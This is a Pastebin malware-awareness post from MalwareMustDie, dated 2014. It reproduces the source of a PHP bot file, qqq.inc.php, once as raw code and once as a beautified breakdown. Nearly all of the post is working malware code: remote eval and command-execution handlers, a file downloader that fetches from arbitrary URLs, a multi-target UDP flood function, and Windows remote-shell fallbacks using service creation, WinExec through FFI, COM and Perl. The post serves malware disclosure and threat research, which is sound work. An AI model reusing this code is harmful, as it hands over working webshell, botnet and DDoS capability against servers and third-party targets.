SHARE
TWEET
qqq.inc.php PHP Hacks aimed DDoS & Windows Remote Shell
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
- # MalwareMustDie Awareness Post
- # Case: Webapp/PHP (Read: Web Hacking)
- # Target OS: Windows (with PHP and/or Perl)
- # Interface: PHP (Flaw), Perl (Shell), FTP (Hacks) Remote Windows Executable Environment/commands
- # Path: /qqq.inc.php
- # UDP Flood, Services Remote Control, API Remote Shell
- # Credit: Malware Hunter @malpush (twitter)
- // Spotted base code (plain or after obfuscation)
- 1) { $evaled = ""; for($i = 1; $i < count($command); $i++) $evaled .= $command[$i];
- if($lasteval != $evaled) { eval($evaled); $lasteval = $evaled; } } if($command[0] ==
- "eval" && count($command) > 1) { $evaled = ""; for($i = 1; $i < count($command); $i
- ++) $evaled .= $command[$i]; eval($evaled); } if($command[0] == "execonce" && count(
- $command) > 1) { $toexec = ""; for($i = 1; $i < count($command); $i++) $toexec .= $c
- ommand[$i]; $toexec = str_replace("%LOLTMPLOL%", whereistmP(), $toexec); if($lastexe
- c != $toexec) { Exe($toexec); $lastexec = $toexec; } } if($command[0] == "exec" && c
- ount($command) > 1) { $toexec = ""; for($i = 1; $i < count($command); $i++) $toexec
- .= $command[$i]; $toexec = str_replace("%LOLTMPLOL%", whereistmP(), $toexec); Exe($t
- oexec); } if($command[0] == "downonce" && count($command) == 3) { $command[1] = str_
- replace("%LOLTMPLOL%", whereistmP(), $command[1]); $command[2] = str_replace("%LOLTM
- PLOL%", whereistmP(), $command[2]); $todown = ""; for($i = 1; $i < count($command);
- $i++) $todown .= $command[$i]; if($lastdown != $todown) { $content = @file_get_conte
- nts($command[1]); file_put_contents($command[2], $content); $lastdown = $todown; } }
- if($command[0] == "down" && count($command) == 3) { $command[1] = str_replace("%LOL
- TMPLOL%", whereistmP(), $command[1]); $command[2] = str_replace("%LOLTMPLOL%", where
- istmP(), $command[2]); $todown = ""; for($i = 1; $i < count($command); $i++) $todown
- .= $command[$i]; $content = @file_get_contents($command[1]); file_put_contents($com
- mand[2], $content); } $end = time(); $left = $time - ($end - $start); if($left > 0)
- sleep($left); } } function whereistmP() { $uploadtmp=ini_get('upload_tmp_dir'); $uf=
- getenv('USERPROFILE'); $af=getenv('ALLUSERSPROFILE'); $se=ini_get('session.save_path
- '); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_wr
- itable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))retur
- n '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if
- (is_dir($uf) && is_writable($uf))return $uf; if(is_dir($af) && is_writable($af))retu
- rn $af; if(is_dir($se) && is_writable($se))return $se; if(is_dir($uploadtmp) && is_w
- ritable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))re
- turn $envtmp; return '.'; } function srvshelL($command) { $name=whereistmP()."\\".un
- iqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system3
- 2\\cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=
- >$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); win32_start_service($n); win3
- 2_stop_service($n); win32_delete_service($n); while(!file_exists($name))sleep(1); $e
- xec=file_get_contents($name); unlink($name); return $exec; } function ffishelL($comm
- and) { $name=whereistmP()."\\".uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int
- WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0)
- ; while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name);
- return $exec; } function comshelL($command,$ws) { $exec=$ws->exec("cmd.exe /c $comm
- and"); $so=$exec->StdOut(); return $so->ReadAll(); } function perlshelL($command) {
- $perl=new perl(); ob_start(); $perl->eval("system(\"$command\")"); $exec=ob_get_cont
- ents(); ob_end_clean(); return $exec; } function Exe($command) { $exec=$output=''; $
- dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(function_exists('passthru')){ob
- _start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} els
- eif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$
- output=ob_get_contents();ob_clean();$exec=$tmp;} elseif(function_exists('exec')){@ex
- ec($command,$output);$output=join("\n",$output);$exec=$output;} elseif(function_exis
- ts('shell_exec'))$exec=@shell_exec($command); elseif(function_exists('popen')){$outp
- ut=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);
- } elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!
- feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($re
- s);} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3))
- === 'WIN')$exec=winshelL($command); elseif(function_exists('win32_create_service')
- && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command); elseif(exten
- sion_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($com
- mand); elseif(extension_loaded('perl'))$exec=perlshelL($command); return $exec; } fu
- nction udpflood($host,$port,$time,$packetsize) { $packet = ""; for($i=0;$i<$packetsi
- ze;$i++) { $packet .= chr(rand(1,256)); } $end = time() + $time; $multitarget = fals
- e; if(strpos($host, ",") !== FALSE) { $multitarget = true; $host = explode(",", $hos
- t); } $i = 0; if($multitarget) { $fp = array(); foreach($host as $hostt) $fp[] = fso
- ckopen("udp://".$hostt,$port,$e,$s,5); $count = count($host); while(true) { fwrite($
- fp[$i % $count],$packet); fflush($fp[$i % $count]); if($i % 100 == 0) { if($end < ti
- me()) break; } $i++; } foreach($fp as $fpp) fclose($fpp); } else { $fp = fsockopen("
- udp://".$host,$port,$e,$s,5); while(true) { fwrite($fp,$packet); fflush($fp); if($i
- % 100 == 0) { if($end < time()) break; } $i++; } fclose($fp); } $env = $i *
- $packetsize; $env = $env / 1048576; $vel = $env / $time; $vel = round($vel);
- $env = round($env); }
- // -----------------------------------------------------
- // Below part is the information of
- // some breakdown of the evil function (after beautified)
- // -----------------------------------------------------
- // PoC Conditions used for remote controls:
- elseif (function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) ===
- 'WIN') $exec = winshelL($command);
- elseif (function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) ===
- 'WIN') $exec = srvshelL($command);
- elseif (extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec =
- ffishelL($command);
- elseif (extension_loaded('perl')) $exec = perlshelL($command);
- return $exec;
- }
- // DDoS / UDP Flooder:
- function udpflood($host, $port, $time, $packetsize)
- {
- $packet = "";
- for ($i = 0; $i < $packetsize; $i++)
- {
- $packet.= chr(rand(1, 256));
- }
- $end = time() + $time;
- $multitarget = false;
- if (strpos($host, ",") !== FALSE)
- {
- $multitarget = true;
- $host = explode(",", $host);
- }
- $i = 0;
- if ($multitarget)
- {
- $fp = array();
- foreach($host as $hostt) $fp[] = fsockopen("udp://" . $hostt, $port, $e, $s, 5);
- $count = count($host);
- while (true)
- {
- fwrite($fp[$i % $count], $packet);
- fflush($fp[$i % $count]);
- if ($i % 100 == 0)
- {
- if ($end < time()) break;
- }
- $i++;
- }
- foreach($fp as $fpp) fclose($fpp);
- }
- else
- {
- $fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
- while (true)
- {
- fwrite($fp, $packet);
- fflush($fp);
- if ($i % 100 == 0)
- {
- if ($end < time()) break;
- }
- $i++;
- }
- fclose($fp);
- }
- $env = $i * $packetsize;
- $env = $env / 1048576;
- $vel = $env / $time;
- $vel = round($vel);
- $env = round($env);
- }
- // Remote shell..(Windows EXE)
- $output = join("\n", $output);
- $exec = $output;
- }
- elseif (function_exists('shell_exec')) $exec = @shell_exec($command);
- elseif (function_exists('popen'))
- {
- $output = @popen($command, 'r');
- while (!feof($output))
- {
- $exec = fgets($output);
- }
- pclose($output);
- }
- elseif (function_exists('proc_open'))
- {
- $res = @proc_open($command, $dep, $pipes);
- while (!feof($pipes[1]))
- {
- $line = fgets($pipes[1]);
- $output.= $line;
- }
- $exec = $output;
- proc_close($res);
- }
- elseif (function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec = winshelL($command);
- elseif (function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec = srvshelL($command);
- elseif (extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec = ffishelL($command);
- elseif (extension_loaded('perl')) $exec = perlshelL($command);
- return $exec;}
- // Perl Shell:
- function perlshelL($command)
- {
- $perl = new perl();
- ob_start();
- $perl->eval("system(\"$command\")");
- $exec = ob_get_contents();
- ob_end_clean();
- return $exec;
- }
- // CMD Shell
- function comshelL($command, $ws)
- {
- $exec = $ws->exec("cmd.exe /c $command");
- $so = $exec->StdOut();
- return $so->ReadAll();
- }
- // ffishell
- function ffishelL($command)
- {
- $name = whereistmP() . "\\" . uniqid('NJ');
- $api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
- $res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
- while (!file_exists($name)) sleep(1);
- $exec = file_get_contents($name);
- unlink($name);
- return $exec;
- // And many more information exclussive for MMD forum members.
- # MalwareMustDie!!
- # Reported by @unixfreaxjp | $ date
- Sun Jan 5 22:21:58 JST 2014
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.